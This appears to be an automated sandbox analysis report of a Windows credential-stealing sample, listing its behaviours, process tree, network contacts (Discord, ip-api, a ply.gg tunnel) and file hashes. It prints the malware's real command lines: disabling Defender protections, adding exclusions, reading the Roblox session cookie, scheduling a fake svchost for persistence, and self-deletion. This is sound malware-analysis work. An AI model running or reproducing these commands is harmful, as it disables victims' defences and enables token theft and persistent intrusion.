Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3571316656-3665257725-2415531812-1000\{10EDE3EA-1E5A-4D22-BFFD-FF930233611B} C:\Windows\System32\WScript.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\New_Project_1 (5).exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3992 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\New_Project_1 (5).exe C:\Users\Admin\AppData\Local\Temp\1.exe
PID 3992 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\New_Project_1 (5).exe C:\Users\Admin\AppData\Local\Temp\1.exe
PID 3992 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\New_Project_1 (5).exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 3992 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\New_Project_1 (5).exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 4592 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 4592 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 4592 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\SYSTEM32\attrib.exe
PID 4592 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\SYSTEM32\attrib.exe
PID 4592 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4592 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4592 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4592 wrote to memory of 3956 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4592 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4592 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4592 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4592 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4592 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 4592 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 4956 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4956 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4592 wrote to memory of 4280 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 4592 wrote to memory of 4280 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 4592 wrote to memory of 3180 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 4592 wrote to memory of 3180 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 4956 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4956 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4592 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4592 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4956 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4956 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4592 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 4592 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\System32\Wbem\wmic.exe
PID 4956 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4956 wrote to memory of 3132 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4956 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\schtasks.exe
PID 4956 wrote to memory of 3920 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Windows\System32\schtasks.exe
PID 4592 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\SYSTEM32\cmd.exe
PID 4592 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\2.exe C:\Windows\SYSTEM32\cmd.exe
PID 2344 wrote to memory of 4380 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 2344 wrote to memory of 4380 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 4956 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Users\Admin\AppData\Local\Temp\yqtmwz.exe
PID 4956 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Users\Admin\AppData\Local\Temp\yqtmwz.exe
PID 4956 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Users\Admin\AppData\Local\Temp\yqtmwz.exe
PID 3852 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\yqtmwz.exe C:\Windows\system32\cmd.exe
PID 3852 wrote to memory of 3372 N/A C:\Users\Admin\AppData\Local\Temp\yqtmwz.exe C:\Windows\system32\cmd.exe
PID 3372 wrote to memory of 3080 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 3372 wrote to memory of 3080 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 4956 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Users\Admin\AppData\Local\Temp\dpkrmq.exe
PID 4956 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\1.exe C:\Users\Admin\AppData\Local\Temp\dpkrmq.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\New_Project_1 (5).exe

"C:\Users\Admin\AppData\Local\Temp\New_Project_1 (5).exe"

C:\Users\Admin\AppData\Local\Temp\1.exe

"C:\Users\Admin\AppData\Local\Temp\1.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\svchost.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\svchost.exe"

C:\Users\Admin\svchost.exe

C:\Users\Admin\svchost.exe

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\2.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\yqtmwz.exe

"C:\Users\Admin\AppData\Local\Temp\yqtmwz.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1671.tmp\1672.tmp\1673.bat C:\Users\Admin\AppData\Local\Temp\yqtmwz.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\6.VBS"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x150 0x304

C:\Users\Admin\svchost.exe

C:\Users\Admin\svchost.exe

C:\Users\Admin\AppData\Local\Temp\dpkrmq.exe

"C:\Users\Admin\AppData\Local\Temp\dpkrmq.exe"

C:\Users\Admin\svchost.exe

C:\Users\Admin\svchost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 233.128.159.162.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 reference-elliott.gl.at.ply.gg udp
US 147.185.221.19:37420 reference-elliott.gl.at.ply.gg tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
NL 23.62.61.171:443 www.bing.com tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 171.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
NL 23.62.61.171:443 www.bing.com tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 66.229.138.52.in-addr.arpa udp

Files

memory/3992-0-0x0000000000400000-0x000000000047C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1.exe

MD5 4e4ffd6981f1d7df1e06e02c7a52e86a
SHA1 970d227a122a826f587fb49c694a422ec6aff1e0
SHA256 353010e5cbdfb234aadfcb40b517b51b24bbac81b64d794d5d8f8b1cd0cd6031
SHA512 1f75401fe015416453119bb92ea46c71412f342fe4bf1170bc2655a1c4f1fb4344bdff64df8dfd54f8203b30445225a70f12790432d3b59693e96de2fa5750ec

C:\Users\Admin\AppData\Local\Temp\2.exe

MD5 8068d967a754039c953d677ed75caa65
SHA1 c6ca62d0e3f84f4018546cdf40b14ac80b06af95
SHA256 b2811334ba1ec945f7f2f1b1976e72dd634a4cf8b5679ceb4c90816d5b646b11
SHA512 8f8f9b0c50f3178daa1df6ce16755c7a0de24872a344fe6b93d1a9b11cfad2faa1ed5ad58c6ac9904b889188d8efaba2d51e4240e7a813fffe6878ec8970954c

memory/4956-62-0x00007FFBF4443000-0x00007FFBF4445000-memory.dmp

memory/4592-122-0x000001E664790000-0x000001E6647D0000-memory.dmp

memory/4956-118-0x0000000000390000-0x00000000003AC000-memory.dmp

memory/4592-123-0x00007FFBF4440000-0x00007FFBF4F01000-memory.dmp

memory/4044-124-0x0000025226F80000-0x0000025226FA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_agqmqt5c.vvh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d42b6da621e8df5674e26b799c8e2aa
SHA1 ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA256 5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA512 53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

memory/4592-150-0x000001E67EEE0000-0x000001E67EF56000-memory.dmp

memory/4592-151-0x000001E666560000-0x000001E6665B0000-memory.dmp

memory/4592-152-0x000001E67EF80000-0x000001E67EF9E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c65738617888921a153bd9b1ef516ee7
SHA1 5245e71ea3c181d76320c857b639272ac9e079b1
SHA256 4640ba4001fd16a593315299cbdd4988dc2c7075820687f1018aac40aca95c26
SHA512 2e2a0ebd93f9d8dd07a7599054bce232683e9add9a35e77b584618040bcfd84a42545352519ec4736cc379002210b6f3ed2d905591c6925c0981b0392b495bfa

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d3235ed022a42ec4338123ab87144afa
SHA1 5058608bc0deb720a585a2304a8f7cf63a50a315
SHA256 10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27
SHA512 236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf

memory/4956-187-0x00007FFBF4440000-0x00007FFBF4F01000-memory.dmp

memory/4592-190-0x000001E67EFC0000-0x000001E67EFD2000-memory.dmp

memory/4592-189-0x000001E67EF70000-0x000001E67EF7A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ef20a3bf9e9f2b5a96161d0df5a08fd9
SHA1 cd499632b1e8d158383e835c6551b6fa358df08c
SHA256 a89b69d78aef6361573f75767caf9128b7912a48de67b85606fdb1e15f036cf9
SHA512 b7893b80acdc3d6002664d4d9509351b44f009ec355f0578f6b5a605ff82becf221843a74e42dea12dbc58c92c995db3870aee583978effbda8a58d7c3e9d62c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 852f019aa3823e1c90335ba698f31412
SHA1 a94ebb8e47316a5fec092ab897ec34299a82d200
SHA256 b4bed2ce3d5b6577836eb2b0a766c008243a1db942e341717fb4bc18e84fc2f0
SHA512 ca94865644cb570f60cf35a08ad5de6a3af4503bc40845237219c31e910f89cc93b280d997514583d86e6cf45eb2b8749bfe2e41bbaef67471e0b64b579e5ab3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 843236648c17e7b11d720f5613760d8a
SHA1 3817030c1334fee32e1c0e6ad08e9cc1392fbedb
SHA256 309c24cd0ff95d7ceb33d58b206fe5d1d31fedadaa36d6e71e2afd444184ea0d
SHA512 e2dbc0bba9dada38be74f7a1d4d4aac5ee60eaa78114643f02883973adfc45b7555cf580d70b541c8ee1626242c2ee61469577c0a17f13d0cd0303d402a8b3aa

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 96ff1ee586a153b4e7ce8661cabc0442
SHA1 140d4ff1840cb40601489f3826954386af612136
SHA256 0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA512 3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

memory/4592-258-0x00007FFBF4440000-0x00007FFBF4F01000-memory.dmp

memory/4956-260-0x00007FFBF4443000-0x00007FFBF4445000-memory.dmp

memory/4956-261-0x00007FFBF4440000-0x00007FFBF4F01000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\yqtmwz.exe

MD5 6520885628fe337b8665099479cc1d4d
SHA1 09741f5c74b3525c31004c5bd19b0ecab835186d
SHA256 13d8121844734f49d93956b30ffab57a220e5fe1345a0bcf89e4df9cd37ab4f4
SHA512 235d7a2cd8751c7f128d6e6014f098f296d49bf1fca6e0c716e3330588f9ab0688a25ab44b02879411b6210f3febdfed35d9beb1ef5a18542578211fbdd9fe9c

memory/3852-270-0x0000000000400000-0x000000000044D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1671.tmp\1672.tmp\1673.bat

MD5 c7da66cab92e95daf435dc74fa5ca35a
SHA1 924f2b0ebac4eac12c78b298697400a1b338a4c5
SHA256 4ab885b4b48037707771cc63658513d3d82a80cf97fbcdf4558e35bc3adc2b92
SHA512 28737deed8241b3c577cc6a2942287d5be0f9a45f9a902696ab733c78fe2bcd0d47d29d0efec6cca57de656472346170379c7d1ba60a5508c31f883674786787

C:\Users\Admin\AppData\Roaming\6.VBS

MD5 9e242f8f35222db7713bf96248c7434c
SHA1 a66a0c27eca4aa325bc3dc8d907837180bcbd1b3
SHA256 5d173c4f51d33ea28ce3a5aa715bc7140f7bcc82c4b99fad2a2d3474c476c731
SHA512 4c4383df59bbbe7d5d86bc0f78b44afc68327789f5244f7cdf55f81889b6e74d008d0b94e6dfec66ac8394699919bc75a038b6c9c380fbe83161ad702b830b56

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

MD5 7050d5ae8acfbe560fa11073fef8185d
SHA1 5bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256 cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512 a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

C:\Users\Admin\AppData\Roaming\piz.mp3

MD5 71cf668f8ebbceda772022165b460ce3
SHA1 99febb0f4f9f388a4f9aeedd1530b50e0790500c
SHA256 321f25cb7284f1b11bea1dd0286efcce180a2ea15357acca7158d575840c3033
SHA512 bbc77a20f1a0a5355e82a40741ed50cc27fbbe97b4615c9f47644288275710ea288504fb97d14f786192bd6db54ba06ed61a3210a3571d988d026293aeb17a63

memory/3852-292-0x0000000000400000-0x000000000044D000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

C:\Users\Admin\AppData\Local\Temp\dpkrmq.exe

MD5 1d7ec5c0d6ee4de23463e0d80d9b7b79
